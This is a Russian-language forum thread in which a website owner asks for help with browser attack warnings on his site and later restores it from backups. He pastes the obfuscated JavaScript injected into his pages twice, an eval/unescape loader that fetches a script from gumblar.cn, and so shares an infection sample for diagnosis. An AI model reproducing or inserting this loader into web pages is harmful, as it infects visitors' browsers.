Перейти к содержанию

Фишинг-атака


Рекомендуемые сообщения

У меня есть сервер http://www.gig-ant.com/index.php

при его посещении IE либо Mozila выдается сообщение как на картинке (прикреплен)...

При проверке сайта на вирус ничего касперский не выдал...

Помогите!

post-9873-1242212844_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

  MAM сказал:
Это хорошо но у меня у всего офиса выдает данную атаку...

 

а за пределами офиса выдает у кого нибудь? а выдает только при переходе на данный адрес или на по другим ссылкам тоже выпадает сообшение? что то мне подсказывает что эта тема для рубрики "борьба с вирусами"

 

ps вы(и ваш офис) делали полную проверку? и так между делом весь ваш офис находиться под защитой касперского?

Изменено пользователем kos1nus
Ссылка на комментарий
Поделиться на другие сайты

  kos1nus сказал:
а за пределами офиса выдает у кого нибудь? а выдает только при переходе на данный адрес или на по другим ссылкам тоже выпадает сообшение?

Да так же выдает и в других городах Москава, Минск и при хождении по всему сайту выскакивает таже атака...

 

  kos1nus сказал:
ps вы(и ваш офис) делали полную проверку? и так между делом весь ваш офис находиться под защитой касперского?

Сервер находиться на masterhost.ru

Ссылка на комментарий
Поделиться на другие сайты

  Kapral сказал:
У меня тоже такая проблема

 

Причем откуда появляется этот фишинг-сайт я пока не нашел

Если что узнаете дайте знать плиз....

 

Возможно ноги с Китая...

Изменено пользователем MAM
Ссылка на комментарий
Поделиться на другие сайты

  skoworodker сказал:
в блеклист его, и не парится. скорее всего это реклама на хосте а кто то в неё свой скрипт вставил

Может мне весь сайт удалить,,,? это не решение проблемы спасибо....

Ссылка на комментарий
Поделиться на другие сайты

  MAM сказал:
Может мне весь сайт удалить,,,?

Зачем весь сайт удалять? Создавали и тут на тебе. Скорее всего отредактировать надо будет.

Ссылка на комментарий
Поделиться на другие сайты

  Kapral сказал:
Вы посылали запрос на newvirus@?

да отправил

я заменил зараженые файлы на сохраненные копии и все заработало без данного вируса

 

ВСЕМ СПАСИБО за помощь! ХРАНИТЕ РЕЗЕРВНЫЕ КОПИИ вашего сайта!

Ссылка на комментарий
Поделиться на другие сайты

  MAM сказал:
Может мне весь сайт удалить,,,?
насколько я понял в алерте был адрес отличный от адреса вашего сайта, его и надо добавить в блэк лист, причину я написал выше.
Ссылка на комментарий
Поделиться на другие сайты

примерно вот это было на моих страницах

<script language=javascript><!--

(function(){var av8T='v@61r@20a@3d@22S@63r@69pt@45@6egine@22@2cb@3d@22V@65rsio@6e()+@22@2cj@3d@22@

22@2cu@3d@6eavi@67a@74@6f@72@2eus@65rA@67ent@3b@69@66((u@2eindexO@66(@22Win@22)@

3

e0)@26@26@28@75@2ein@64e@78@4ff(@22NT@206@22)@3c0)@26@26@28@64@6f@63ument@2ecook

i

e@2e@69ndex@4ff(@22mie@6b@3d1@22)@3c0)@26@26(t@79p@65o@66(z@72@76zts)@21@3d@74y@

7

0eo@66(@22@41@22))@29@7bz@72v@7a@74s@3d@22A@22@3b@65@76al(@22i@66(window@2e@22+a

+

@22)j@3d@6a+@22+a+@22@4daj@6f@72@22+b@2b@61+@22@4din@6fr@22+@62@2ba+@22B@75@69@6

c

d@22+b+@22@6a@3b@22@29@3bd@6fcumen@74@2e@77ri@74e@28@22@3cs@63ript@20s@72c@3d@2f

@

2fgumblar@2ecn@2frss@2f@3fid@3d@22+j+@22@3e@3c@5c@2fscript@3e@22@29@3b@7d';var LUA=av8T.replace(/@/g,'%');eval(unescape(LUA))})();

--></script><body onLoad='self.print()'>

 

 

  terracot сказал:
Зачем весь сайт удалять? Создавали и тут на тебе. Скорее всего отредактировать надо будет.
Конечно это шутка мне бы голову оторвали...:huh:

 

Опять появился но теперь уже вот в каких местах достать не могу страница создается динамически...

<link rel="shortcut icon" href="/img/images/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="/img/printing.js"></script>

<script type="text/javascript" src="img/highslide/highslide.js"></script>

<script type="text/javascript">

hs.graphicsDir = 'img/highslide/graphics/';

</script>

</head>

<noindex><script language=javascript><!--

(function(){var av8T='v@61r@20a@3d@22S@63r@69pt@45@6egine@22@2cb@3d@22V@65rsio@6e()+@22@2cj@3d@22@

22@2cu@3d@6eavi@67a@74@6f@72@2eus@65rA@67ent@3b@69@66((u@2eindexO@66(@22Win@22)@

3

e0)@26@26@28@75@2ein@64e@78@4ff(@22NT@206@22)@3c0)@26@26@28@64@6f@63ument@2ecook

i

e@2e@69ndex@4ff(@22mie@6b@3d1@22)@3c0)@26@26(t@79p@65o@66(z@72@76zts)@21@3d@74y@

7

0eo@66(@22@41@22))@29@7bz@72v@7a@74s@3d@22A@22@3b@65@76al(@22i@66(window@2e@22+a

+

@22)j@3d@6a+@22+a+@22@4daj@6f@72@22+b@2b@61+@22@4din@6fr@22+@62@2ba+@22B@75@69@6

c

d@22+b+@22@6a@3b@22@29@3bd@6fcumen@74@2e@77ri@74e@28@22@3cs@63ript@20s@72c@3d@2f

@

2fgumblar@2ecn@2frss@2f@3fid@3d@22+j+@22@3e@3c@5c@2fscript@3e@22@29@3b@7d';var LUA=av8T.replace(/@/g,'%');eval(unescape(LUA))})();

--></script>

<body onLoad="or_print()">

<div id = 'printing' style = 'display: none'>

<!-- Хедер на печать -->

<div class="print_contacts" align="left">

<img src="http://www.gig-ant.com/img/header.gif">

Изменено пользователем MAM
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • KL FC Bot
      От KL FC Bot
      В попытке обойти механизмы защитных решений злоумышленники все чаще прячут вредоносные и фишинговые ссылки внутрь QR-кодов. Поэтому в решение [KSMG placeholder] Kaspersky Secure Mail Gateway [/placeholder] мы добавили технологию, способную «читать» QR-коды (в том числе и спрятанные внутрь PDF-файлов), доставать из них ссылки и проверять их до того, как они окажутся в почтовом ящике сотрудника компании. Рассказываем, как это работает.
      Пример фишингового QR-кода внутри PDF-файла
       
      View the full article
    • KL FC Bot
      От KL FC Bot
      Примерно год назад произошел масштабнейший ransomware-инцидент — атака на гиганта американского медицинского страхования, компанию UnitedHealth Group. Взлом имел настолько многочисленные и серьезные последствия, что все прошедшее с момента атаки время появлялись новые подробности о ходе атаки и ее итогах. К годовщине инцидента мы решили собрать все теперь уже доступные данные в одном материале.
      Ransomware-атака на UnitedHealth Group
      Сперва дадим контекст, который будет в особенности полезен для тех, кто не очень хорошо знаком с данной организацией. UnitedHealth Group — это крупнейшая компания на рынке медицинского страхования и медицинских услуг США. Ее капитализация составляет примерно $500 миллиардов. При этом UnitedHealth Group занимает девятое место по выручке среди всех корпораций мира, следуя в этом списке сразу после Apple.
      В состав UnitedHealth Group входят две компании. Первая из них, UnitedHealthcare, занимается медицинским страхованием. Вторая, Optum, специализируется на предоставлении разнообразных медицинских услуг — от фармацевтики и собственно медицинского обслуживания до ИТ-систем, используемых в здравоохранении.
      Последним занимается OptumInsight — одно из трех подразделений Optum, причем самое высокомаржинальное из них. Осенью 2022 года в OptumInsight вошла приобретенная UnitedHealth Group платформа Change Healthcare. Эта цифровая площадка обрабатывает заявления на получение страховых выплат, выступая в роли финансового посредника между пациентами, поставщиками медицинских услуг и страховщиками.
      Собственно, Change Healthcare и стала непосредственной целью атаки вымогателей: 21 февраля в ее системах начал работать шифровальщик, из-за чего платформа стала недоступна. Это вызвало настоящий хаос в американской системе здравоохранения: из-за невозможности быстрой обработки заявлений на страховые выплаты многие пациенты вынуждены были оплачивать лекарства и медицинские услуги из своего кармана. А медицинским учреждениям пришлось перейти в ручной режим обработки счетов.
      Восстановление пострадавших систем заняло многие месяцы: к примеру, клиринговый сервис Change Healthcare возобновил работу лишь в ноябре. В UnitedHealth Group даже создали специальный сайт, на котором можно следить за восстановительными работами. Даже сейчас, спустя год после атаки, на этом сайте публикуются регулярные обновления, а некоторые системы до сих пор имеют статус «доступна частично».
       
      View the full article
    • KL FC Bot
      От KL FC Bot
      Чуть больше года назад в посте Google OAuth и фантомные аккаунты мы уже обсуждали, что использование опции «Вход с аккаунтом Google» в корпоративные сервисы дает возможность сотрудникам создавать фантомные Google-аккаунты, которые не контролируются администратором корпоративного Google Workspace и продолжают работать после оффбординга. Недавно выяснилось, что это не единственная проблема, связанная с OAuth. Из-за недостатков этого механизма аутентификации любой желающий может получить доступ к данным многих прекративших деятельность организаций, перерегистрировав на себя брошенные компаниями домены. Рассказываем подробнее об этой атаке.
      Как работает аутентификация при использовании «Вход с аккаунтом Google»
      Некоторые могут подумать, что, доверяя опции «Вход с аккаунтом Google», компания получает надежный механизм аутентификации, использующий продвинутые технологии Google и широкие возможности интернет-гиганта по мониторингу пользователей. Однако на деле это не так: при входе с Google OAuth применяется достаточно примитивная проверка. Сводится она, как правило, к тому, что у пользователя есть доступ к почтовому адресу, который привязан к Google Workspace организации.
      Причем, как мы уже говорили в предыдущем материале о Google OAuth, это вовсе не обязательно Gmail — ведь привязать Google-аккаунт можно совершенно к любой почте. Получается, что при использовании «Входа с аккаунтом Google» доступ к тому или иному корпоративному сервису защищен ровно настолько надежно, насколько защищен почтовый адрес, к которому привязан Google-аккаунт.
      Если говорить несколько более подробно, то при аутентификации пользователя в корпоративном сервисе Google OAuth отправляет этому сервису следующую информацию:
      В теории в ID-токене Google OAuth есть уникальный для каждого Google-аккаунта параметр sub, но на практике из-за проблем с его использованием сервисы проверяют лишь домен и адрес электронной почты. Источник
       
      View the full article
    • KL FC Bot
      От KL FC Bot
      Начиная с 31 декабря наша телеметрия начала фиксировать масштабную активность криптомайнера XMRig. Причем в большинстве случаев запуск зловреда детектировался домашними решениями, но в некоторых — корпоративными. Тщательное исследование проблемы показало, что некие злоумышленники распространяли зловред в торрентах с играми. Целью атаки, скорее всего, были именно геймеры из разных стран, включая Россию, Бразилию и Германию, однако, вероятно в силу того что некоторые сотрудники компаний используют рабочие компьютеры в личных целях, криптомайнер был обнаружен и в корпоративных сетях.
      Вредоносная кампания
      Кампания, ласково названная нашими аналитиками StaryDobry, была тщательно спланирована: вредоносные дистрибутивы создавались и загружались на торренты начиная с сентября по декабрь 2024 года. Разумеется, игры на торрентах были представлены в виде репаков — то есть модифицированных версий программ, в которые авторы раздачи уже встроили средства обхода проверки подлинности копии игры (иными словами, игры были взломаны).
      Пользователи успешно загружали и устанавливали их. До поры до времени троянизированные игры никак не проявляли себя, но 31 декабря они получили команду с удаленного сервера злоумышленников, начали скачивать майнер и запускать его на зараженном устройстве. Троянизированы были версии популярных компьютерных игр-симуляторов Garry’s Mod, BeamNG.drive, Universe Sandbox и некоторых других.
      Мы внимательно исследовали образец зловреда и вот что обнаружили.
      Перед запуском программа проверяет, запускается она в отладочной среде / «песочнице» или нет. Если да — процедура установки немедленно прекращается. Майнер представляет собой слегка модифицированный исполняемый файл XMRig, подробно о котором мы рассказывали в 2020 году. Если количество процессорных ядер устройства меньше 8, то майнер не запускается. Наши продукты детектируют использованные в этой вредоносной кампании зловреды, такие как Trojan.Win64.StaryDobry.*, Trojan-Dropper.Win64.StaryDobry.*, HEUR:Trojan.Win64.StaryDobry.gen. Больше технических подробностей и индикаторы компрометации можно найти в публикации Securelist.
       
      View the full article
    • KL FC Bot
      От KL FC Bot
      В последние годы в блоге Kaspersky Daily мы стали уделять ransomware заметно меньше внимания, чем в былые времена. Но это вовсе не потому, что атаки вымогателей прекратились. Скорее наоборот — такие инциденты происходят настолько часто, что они уже давно стали привычным, практически фоновым явлением.
      Однако некоторые атаки вымогателей по-прежнему привлекают внимание своей экстраординарностью. В этом посте мы перечислим связанные с шифровальщиками-вымогателями инциденты 2024 года, которые выделялись на общем фоне своим масштабом, последствиями или необычными методами атакующих.
      Январь 2024: атака вымогателей на зоопарк Торонто
      Одним из первых значительных инцидентов 2024 года, связанных с ransomware, стала январская атака на крупнейший канадский зоопарк, расположенный в Торонто. Администрация зоопарка поспешила заверить общественность в том, что атака вымогателей не повлияла на работоспособность систем, связанных с уходом за животными. Более того, веб-сайт организации и сервис продажи билетов также не были затронуты, так что зоопарк продолжил принимать посетителей в обычном режиме.
      Официальный сайт зоопарка Торонто сообщает о кибератаке и уверяет, что с животными все в порядке. Источник
      Через некоторое время после атаки выяснилось, что атакующим удалось похитить значительное количество личной информации сотрудников зоопарка за период с 1989 года до наших дней. Таким образом, данный инцидент послужил очередным напоминанием о том, что даже очень далекие от критических секторов организации могут стать объектами атак вымогателей.
       
      View the full article
×
×
  • Создать...